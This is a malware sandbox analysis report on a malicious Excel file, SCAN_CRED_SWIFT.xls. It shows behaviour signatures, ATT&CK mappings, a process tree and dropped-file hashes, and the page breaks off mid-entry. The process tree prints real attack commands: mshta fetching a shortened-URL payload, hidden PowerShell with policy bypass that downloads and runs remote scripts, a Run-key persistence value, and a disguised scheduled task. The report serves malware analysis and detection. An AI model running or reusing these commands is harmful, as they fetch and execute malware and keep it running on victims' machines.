6c3e2de1ae1bd65297af6ae24897368d24db8f74a1bb755dfa129dc203691543

Analysis

max time kernel
150s
max time network
145s
platform
windows7_x64
resource
win7v20210408
submitted
10-05-2021 06:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SCAN_CRED_SWIFT.xls
Size

60KB
MD5

ab00a2b6e072cd6a7adac6a227e129fb
SHA1

33a115a303e9a12fefa325821c791f42746c45db
SHA256

6c3e2de1ae1bd65297af6ae24897368d24db8f74a1bb755dfa129dc203691543
SHA512

2422a063ffdea9329f2612871bb7a9576c5df6f38d85d3f004ee86223a4a6ed39c636062521839be38d526bf64fec3bf3ad8fd0c6bac6dd9568378ce5354778a

Score

10^/10

persistence

Malware Config

Signatures

Process spawned unexpected child process 6 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exemshta.exepowershell.exepowershell.exemshta.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	616	484	mshta.exe	EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1688	484	mshta.exe	EXCEL.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1396	1604	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1036	1604	powershell.exe
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2476	484	mshta.exe	EXCEL.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2912	1604	powershell.exe

Blocklisted process makes network request 29 IoCs

Processes:

mshta.exemshta.exemshta.exe

flow	pid	process
9	1688	mshta.exe
10	616	mshta.exe
13	616	mshta.exe
14	1688	mshta.exe
17	1688	mshta.exe
18	616	mshta.exe
20	616	mshta.exe
21	1688	mshta.exe
24	1688	mshta.exe
25	616	mshta.exe
26	616	mshta.exe
27	1688	mshta.exe
30	616	mshta.exe
31	1688	mshta.exe
34	1688	mshta.exe
35	616	mshta.exe
36	1688	mshta.exe
37	616	mshta.exe
40	1688	mshta.exe
41	1688	mshta.exe
42	616	mshta.exe
43	616	mshta.exe
46	616	mshta.exe
47	1688	mshta.exe
48	616	mshta.exe
50	2476	mshta.exe
51	2476	mshta.exe
52	2476	mshta.exe
53	2476	mshta.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exemshta.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)\|IEX\"\", 0 : window.close\")"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)\|IEX\"\", 0 : window.close\")"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)\|IEX\"\", 0 : window.close\")"	mshta.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1596 schtasks.exe
784 schtasks.exe
2812 schtasks.exe
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2124 taskkill.exe
2176 taskkill.exe
2296 taskkill.exe
2368 taskkill.exe
2976 taskkill.exe
2964 taskkill.exe

pid	process
1596	schtasks.exe
784	schtasks.exe
2812	schtasks.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
2124	taskkill.exe
2176	taskkill.exe
2296	taskkill.exe
2368	taskkill.exe
2976	taskkill.exe
2964	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 12 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXEmshta.exemshta.exemshta.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

484 EXCEL.EXE

pid	process
484	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1036	powershell.exe
1396	powershell.exe
1396	powershell.exe
1036	powershell.exe
2864	powershell.exe
1032	powershell.exe
1028	powershell.exe
2912	powershell.exe
2912	powershell.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

powershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1036	powershell.exe
Token: SeDebugPrivilege	1396	powershell.exe
Token: SeDebugPrivilege	2124	taskkill.exe
Token: SeDebugPrivilege	2176	taskkill.exe
Token: SeDebugPrivilege	2368	taskkill.exe
Token: SeDebugPrivilege	2296	taskkill.exe
Token: SeDebugPrivilege	2964	taskkill.exe
Token: SeDebugPrivilege	2976	taskkill.exe
Token: SeDebugPrivilege	1028	powershell.exe
Token: SeDebugPrivilege	1032	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

EXCEL.EXE

pid process

484 EXCEL.EXE
484 EXCEL.EXE
484 EXCEL.EXE
484 EXCEL.EXE
484 EXCEL.EXE
484 EXCEL.EXE
484 EXCEL.EXE
484 EXCEL.EXE
484 EXCEL.EXE
484 EXCEL.EXE

pid	process
484	EXCEL.EXE
484	EXCEL.EXE
484	EXCEL.EXE
484	EXCEL.EXE
484	EXCEL.EXE
484	EXCEL.EXE
484	EXCEL.EXE
484	EXCEL.EXE
484	EXCEL.EXE
484	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EXCEL.EXEmshta.exemshta.execmd.execmd.exemshta.exe

description	pid	process	target process
PID 484 wrote to memory of 1600	484	EXCEL.EXE	splwow64.exe
PID 484 wrote to memory of 1600	484	EXCEL.EXE	splwow64.exe
PID 484 wrote to memory of 1600	484	EXCEL.EXE	splwow64.exe
PID 484 wrote to memory of 1600	484	EXCEL.EXE	splwow64.exe
PID 484 wrote to memory of 616	484	EXCEL.EXE	mshta.exe
PID 484 wrote to memory of 616	484	EXCEL.EXE	mshta.exe
PID 484 wrote to memory of 616	484	EXCEL.EXE	mshta.exe
PID 484 wrote to memory of 616	484	EXCEL.EXE	mshta.exe
PID 484 wrote to memory of 1688	484	EXCEL.EXE	mshta.exe
PID 484 wrote to memory of 1688	484	EXCEL.EXE	mshta.exe
PID 484 wrote to memory of 1688	484	EXCEL.EXE	mshta.exe
PID 484 wrote to memory of 1688	484	EXCEL.EXE	mshta.exe
PID 1688 wrote to memory of 1612	1688	mshta.exe	cmd.exe
PID 1688 wrote to memory of 1612	1688	mshta.exe	cmd.exe
PID 1688 wrote to memory of 1612	1688	mshta.exe	cmd.exe
PID 1688 wrote to memory of 1612	1688	mshta.exe	cmd.exe
PID 616 wrote to memory of 948	616	mshta.exe	cmd.exe
PID 616 wrote to memory of 948	616	mshta.exe	cmd.exe
PID 616 wrote to memory of 948	616	mshta.exe	cmd.exe
PID 616 wrote to memory of 948	616	mshta.exe	cmd.exe
PID 616 wrote to memory of 784	616	mshta.exe	schtasks.exe
PID 616 wrote to memory of 784	616	mshta.exe	schtasks.exe
PID 616 wrote to memory of 784	616	mshta.exe	schtasks.exe
PID 1688 wrote to memory of 1596	1688	mshta.exe	schtasks.exe
PID 616 wrote to memory of 784	616	mshta.exe	schtasks.exe
PID 1688 wrote to memory of 1596	1688	mshta.exe	schtasks.exe
PID 1688 wrote to memory of 1596	1688	mshta.exe	schtasks.exe
PID 1688 wrote to memory of 1596	1688	mshta.exe	schtasks.exe
PID 1612 wrote to memory of 1032	1612	cmd.exe	powershell.exe
PID 1612 wrote to memory of 1032	1612	cmd.exe	powershell.exe
PID 1612 wrote to memory of 1032	1612	cmd.exe	powershell.exe
PID 1612 wrote to memory of 1032	1612	cmd.exe	powershell.exe
PID 948 wrote to memory of 1028	948	cmd.exe	powershell.exe
PID 948 wrote to memory of 1028	948	cmd.exe	powershell.exe
PID 948 wrote to memory of 1028	948	cmd.exe	powershell.exe
PID 948 wrote to memory of 1028	948	cmd.exe	powershell.exe
PID 1688 wrote to memory of 2124	1688	mshta.exe	taskkill.exe
PID 1688 wrote to memory of 2124	1688	mshta.exe	taskkill.exe
PID 1688 wrote to memory of 2124	1688	mshta.exe	taskkill.exe
PID 1688 wrote to memory of 2124	1688	mshta.exe	taskkill.exe
PID 616 wrote to memory of 2176	616	mshta.exe	taskkill.exe
PID 616 wrote to memory of 2176	616	mshta.exe	taskkill.exe
PID 616 wrote to memory of 2176	616	mshta.exe	taskkill.exe
PID 616 wrote to memory of 2176	616	mshta.exe	taskkill.exe
PID 1688 wrote to memory of 2368	1688	mshta.exe	taskkill.exe
PID 1688 wrote to memory of 2368	1688	mshta.exe	taskkill.exe
PID 1688 wrote to memory of 2368	1688	mshta.exe	taskkill.exe
PID 1688 wrote to memory of 2368	1688	mshta.exe	taskkill.exe
PID 616 wrote to memory of 2296	616	mshta.exe	taskkill.exe
PID 616 wrote to memory of 2296	616	mshta.exe	taskkill.exe
PID 616 wrote to memory of 2296	616	mshta.exe	taskkill.exe
PID 616 wrote to memory of 2296	616	mshta.exe	taskkill.exe
PID 484 wrote to memory of 2476	484	EXCEL.EXE	mshta.exe
PID 484 wrote to memory of 2476	484	EXCEL.EXE	mshta.exe
PID 484 wrote to memory of 2476	484	EXCEL.EXE	mshta.exe
PID 484 wrote to memory of 2476	484	EXCEL.EXE	mshta.exe
PID 2476 wrote to memory of 2780	2476	mshta.exe	cmd.exe
PID 2476 wrote to memory of 2780	2476	mshta.exe	cmd.exe
PID 2476 wrote to memory of 2780	2476	mshta.exe	cmd.exe
PID 2476 wrote to memory of 2780	2476	mshta.exe	cmd.exe
PID 2476 wrote to memory of 2812	2476	mshta.exe	schtasks.exe
PID 2476 wrote to memory of 2812	2476	mshta.exe	schtasks.exe
PID 2476 wrote to memory of 2812	2476	mshta.exe	schtasks.exe
PID 2476 wrote to memory of 2812	2476	mshta.exe	schtasks.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SCAN_CRED_SWIFT.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:484

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1600

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" http://www.j.mp/sdupudoobbaiiusisi
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:616

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-1.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-2.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-3.txt') -useB)
3⤵
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-1.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-2.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-3.txt') -useB)
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1028

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/34.html\"
3⤵
- Creates scheduled task(s)
PID:784

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2176

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2296

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" http://www.j.mp/sdupudoobbaiiusisi
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-1.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-2.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-3.txt') -useB)
3⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-1.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-2.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-3.txt') -useB)
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1032

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/34.html\"
3⤵
- Creates scheduled task(s)
PID:1596

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2124

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2368

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" http://www.j.mp/sdupudoobbaiiusisi
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-1.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-2.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-3.txt') -useB)
3⤵
PID:2780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-1.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-2.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/34-3.txt') -useB)
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/34.html\"
3⤵
- Creates scheduled task(s)
PID:2812

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2976

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe ((gp HKCU:\Software).nasdnasndnad)|IEX
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe ((gp HKCU:\Software).nasdnasndnad)|IEX
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe ((gp HKCU:\Software).nasdnasndnad)|IEX
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2912

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_12581005FAAA458AF2B26E11159E6E6C
MD5
073b62400c2fdf8451d4c5f2bc892caf

SHA1
acd963e51145b6a7da8c26639ec129f14e132dfb

SHA256
07f07e27e813e8e40f08989edb066fb09ccb02321211447a3f44717daa313bf4

SHA512
c308d501f55c8becfb4cbfc43ca944c70e9da2b22682290cf30bd3a42267ca28deece3150fb4bf10653802b94c054fb9a6f7f63df1258ef8e19fb03ccd771099

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_5F0F16F363E79E7BD83FDF03966FD918
MD5
a2843e2b32724248ad9fa416fc0a386e

SHA1
9416919cd02057962663fe7ee8805edb157941a6

SHA256
59c4b4f225aa636e544c61112c91982862ef9ba1d9e7f47565d85e3e18d183fd

SHA512
cd0d406660364cced9404d8dd727432cc6b431cd922e0df511683d3a3fc381bf8d0975610b8c5364d3e4625d95be245a7d01a7d06bf4e314796464bebc17eb9d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_73D499775FFD65EBA82BA5EA2DCA7900
MD5
b13b1026b502a1f3306a15b4260bdb87

SHA1
f5ef8e7b632d4ea8c4f33672547e70f2948d3490

SHA256
32913cc45adb9509ceacac69cc382a44de4c732ad0cae79f5dfd6029c14d1f78

SHA512
9c6bacc350bf1065ee88e15576ea7a5641836ddffcbd74c4b2510bca40101e309e1296deea3dff599f5add7a3be62fba34036728a96af24a3490ff92cfacb86e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_73D499775FFD65EBA82BA5EA2DCA7900
MD5
b13b1026b502a1f3306a15b4260bdb87

SHA1
f5ef8e7b632d4ea8c4f33672547e70f2948d3490

SHA256
32913cc45adb9509ceacac69cc382a44de4c732ad0cae79f5dfd6029c14d1f78

SHA512
9c6bacc350bf1065ee88e15576ea7a5641836ddffcbd74c4b2510bca40101e309e1296deea3dff599f5add7a3be62fba34036728a96af24a3490ff92cfacb86e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_94A2BF216067619D06CA9E8C3205E0E5
MD5
fc5dd4eb55001c010a49e445ce6ceb56

SHA1
f4eae3e0e6136e96ba3a1b949544a03f79b0da86

SHA256
c5b85de67c2d00c97b0d4516ae2674ed62a7a2b37849bc85b0e8d9aeb672998a

SHA512
8c5b2f8a5adf07701b858bac8230689c36643a6e3f87ca023ab1eff7cce2ef88581f3783d633a5179e9658cd46853daa03a7935372056f0b0cbf8cca0c17cf56

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_9A9DE9FECBE3B0F83A4701DBF749FD85
MD5
e993d09efac2835b9fa6064e6b1d1c61

SHA1
ea0b13d38b7e0d62f068579c869d1202d14d08f2

SHA256
1d0d8b01ae369145241ec58b9c14397ba05c072df62df33490509eb0ec391260

SHA512
46e24c4575330474a99b4d6ae4fa146cfdab32b7637316eb8c10220ce1ae16c58cf8f7cf4a6eac68b8040475bf0a85c7348620505d5aae9f0838c2fb73732d3e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_9A9DE9FECBE3B0F83A4701DBF749FD85
MD5
e993d09efac2835b9fa6064e6b1d1c61

SHA1
ea0b13d38b7e0d62f068579c869d1202d14d08f2

SHA256
1d0d8b01ae369145241ec58b9c14397ba05c072df62df33490509eb0ec391260

SHA512
46e24c4575330474a99b4d6ae4fa146cfdab32b7637316eb8c10220ce1ae16c58cf8f7cf4a6eac68b8040475bf0a85c7348620505d5aae9f0838c2fb73732d3e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_FBAEB80C9BF0DBA8C23DA75AE6503569
MD5
200519677a6b4c82601f0afef446055b

SHA1
9ee162d9aab628d3aefd85189a0cfdc06e02ce7b

SHA256
201509d5e7764004f6b185f318fc5e3192bdc91d50da8cd8eba22fb7f486191a

SHA512
6398d522a08549edecf6d5ac9fa2e964ba319c5a8d48263a738d540b067281352cf50997c342b002e5ab97a6b73f825734ff6aef07563315cba20fa53151c71a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_FBAEB80C9BF0DBA8C23DA75AE6503569
MD5
200519677a6b4c82601f0afef446055b

SHA1
9ee162d9aab628d3aefd85189a0cfdc06e02ce7b

SHA256
201509d5e7764004f6b185f318fc5e3192bdc91d50da8cd8eba22fb7f486191a

SHA512
6398d522a08549edecf6d5ac9fa2e964ba319c5a8d48263a738d540b067281352cf50997c342b002e5ab97a6b73f825734ff6aef07563315cba20fa53151c71a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
MD5
4f914d6a12b48374677859978d3def97

SHA1
d29a1ff9bc1fbf5c4c0cf3210c9aefe33fc8e5a5

SHA256
eb9ac8c88c0857b9588076073491eec79f4725aa32bc7af00c20ef31095d1d68

SHA512
ab9cc44820d05b5207d1210e189041f3df258346619f05ae1b058de8b358438095a09b0fed26fcf09d7d08caae353f680936ebe24fdc94c18411463d5ecfbe61

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
MD5
4f914d6a12b48374677859978d3def97

SHA1
d29a1ff9bc1fbf5c4c0cf3210c9aefe33fc8e5a5

SHA256
eb9ac8c88c0857b9588076073491eec79f4725aa32bc7af00c20ef31095d1d68

SHA512
ab9cc44820d05b5207d1210e189041f3df258346619f05ae1b058de8b358438095a09b0fed26fcf09d7d08caae353f680936ebe24fdc94c18411463d5ecfbe61

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
892939f5fc0d95c2b514a801748bae2f

SHA1
f5e2d81b4b64efd6eb3c52fc69b57bacb1ba2266

SHA256
7e8ce6df5b42a47f8eae219e3ebde3ba2da4b1819307df5d7a0788e306d1f9fb

SHA512
4736119b3c771fb7cdff9c59601fb4e6891b8213e8e3dde1984f1286028f620e665bdf98c9af2d9f163a39c04b2a228f11d8e64ec5a10f9817ff2bc1091fb40d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
892939f5fc0d95c2b514a801748bae2f

SHA1
f5e2d81b4b64efd6eb3c52fc69b57bacb1ba2266

SHA256
7e8ce6df5b42a47f8eae219e3ebde3ba2da4b1819307df5d7a0788e306d1f9fb

SHA512
4736119b3c771fb7cdff9c59601fb4e6891b8213e8e3dde1984f1286028f620e665bdf98c9af2d9f163a39c04b2a228f11d8e64ec5a10f9817ff2bc1091fb40d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CC197601BE0898B7B0FCC91FA15D8A69_12581005FAAA458AF2B26E11159E6E6C
MD5
ff249a81912c279b8ba81bdf32fc2e32

SHA1
7a88b6508f0204558d1d4f25d2b9f71aa3ab3e9d

SHA256
f90429b70ee4b1bfbe6f7757ffc99e7d141033cd8289d54abfb1691f604950a4

SHA512
